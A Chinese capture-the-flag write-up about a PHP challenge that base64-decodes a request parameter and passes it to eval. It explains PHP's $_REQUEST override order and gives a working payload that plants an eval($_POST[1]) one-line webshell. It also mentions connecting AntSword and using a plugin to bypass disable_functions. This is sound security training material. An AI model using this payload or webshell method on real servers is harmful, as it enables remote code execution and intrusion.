$_REQUEST的优先级以及disable_function的绕过
本题代码
<?php
highlight_file(__FILE__);
class ClassName
{
public $code = null;
public $decode = null;
function __construct()
{
$this->code = @$this->x()['Ginkgo'];
$this->decode = @base64_decode( $this->code );
@Eval($this->decode);
}
public function x()
{
return $_REQUEST;
}
}
new ClassName();
大致就是Ginkgo接受的值要base64加密,之后他就会执行eval。
先传入phpinfo();查看
disable_function禁用了大多函数,可以使用蚁剑插件进行绕过
$_REQUEST的优先级
$_REQUEST是可以接受$_GET,$_POST,$_Cookie的,
php配置文件默认的处理优先级,默认的数据写入顺序是EGPCS
E代表$_ENV
G代表$_GET
P代表$_POST
C代表$_COOKIE
S代表$_SERVER
当同时一个参数名,越往后的可以覆盖前面的参数。
回归本题,利用Ginkgo传入一句话木马。
payload:
?Ginkgo=ZXZhbCgkX1BPU1RbMV0pOw==
本题前面有eval还增加eval原因是eval是把内容当作php代码执行写入$_POST[1]就不是一句话木马了,所以再增加一个eval(disable_function刚好没禁用)
蚁剑连上
根目录有个假flag,真的flag在readflag。